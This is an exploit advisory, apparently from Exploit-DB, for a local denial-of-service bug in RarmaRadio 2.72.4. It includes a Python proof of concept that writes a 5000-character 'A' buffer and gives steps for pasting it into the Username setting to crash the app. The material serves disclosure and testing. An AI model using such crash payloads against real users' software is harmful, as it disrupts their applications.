Vendor: RarmaRadio
By: chuyreds
CVSS: 7.5 (HIGH)
Vulnerability Type: Denial of Service (DoS) Local
CWE: 20
Product Name: RarmaRadio
Affected Version From: 2.72.4
Affected Version To: 2.72.4
Patch Exists: YES
Related CWE: N/A
CPE: a:raimersoft:rarmaradio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2020

RarmaRadio 2.72.4 – ‘username’ Denial of Service (PoC)

RarmaRadio 2.72.4 is vulnerable to a denial of service attack when a maliciously crafted username is used. Running the Python script 'rarmaradio_username.py' creates a text file containing a buffer of 5000 'A' characters. When the contents of this text file are copied to the clipboard and pasted into the 'Username' field in the 'Network' settings, the application crashes.

Mitigation:

Upgrade to the latest version of RarmaRadio.

Exploit-DB raw data:

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: rarmaradio_username.py
# 2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
# 3.- Open RarmaRadio
# 4.- Select "Edit" > "Settings" > "Network"
# 5.- In "Username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

# Payload: 5000 'A' characters (0x41)
buffer = "\x41" * 5000

# Write the payload to the text file opened in step 2
with open("RarmaRadio2.72.4_username.txt", "w") as f:
    f.write(buffer)